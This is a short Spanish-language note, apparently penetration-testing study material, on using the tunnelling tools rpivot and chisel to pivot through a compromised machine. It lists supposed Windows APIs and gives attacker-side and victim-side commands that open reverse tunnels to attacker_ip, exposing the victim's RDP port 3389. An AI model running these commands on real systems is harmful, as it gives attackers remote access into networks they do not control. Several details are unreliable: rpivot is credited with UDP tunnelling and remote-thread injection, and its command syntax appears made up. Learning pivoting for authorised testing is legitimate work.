RPivot y Chisel

1. rpivot

rpivot es una herramienta utilizada para crear túneles de red a través de una máquina comprometida. Usa conexiones inversas y puede crear túneles tanto de TCP como de UDP.

GitHub - klsecservices/rpivot: socks4 reverse proxy for penetration testingGitHub

APIs Utilizadas:

• CreateProcess: Para ejecutar procesos y comandos.

• CreateRemoteThread: Para inyectar y ejecutar código en procesos remotos.

• CreateNamedPipe: Para establecer canales de comunicación entre procesos locales y remotos.

2. chisel

chisel es una herramienta rápida de túneles TCP/UDP escrita en Go que puede ser utilizada para realizar pivoting y redirigir tráfico de red.

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

APIs Utilizadas:

• Socket API (Winsock): Para crear y gestionar sockets de red.

• Connect: Para establecer conexiones a sockets remotos.

• Bind: Para enlazar sockets locales a puertos específicos.

• Listen: Para escuchar en puertos específicos para conexiones entrantes.

• Accept: Para aceptar conexiones entrantes en sockets.

Ejemplo de Configuración con rpivot y chisel

1. Uso de rpivot

• Comando en la máquina atacante:

  Copiar

  rpivot -server -bind :8080

• Comando en la máquina comprometida:

  Copiar

  rpivot -client -connect attacker_ip:8080 -local 8081:127.0.0.1:3389

2. Uso de chisel

• Comando en la máquina atacante:

  Copiar

  chisel server -p 8000 --reverse

• Comando en la máquina comprometida:

  Copiar

  chisel client attacker_ip:8000 R:8081:127.0.0.1:3389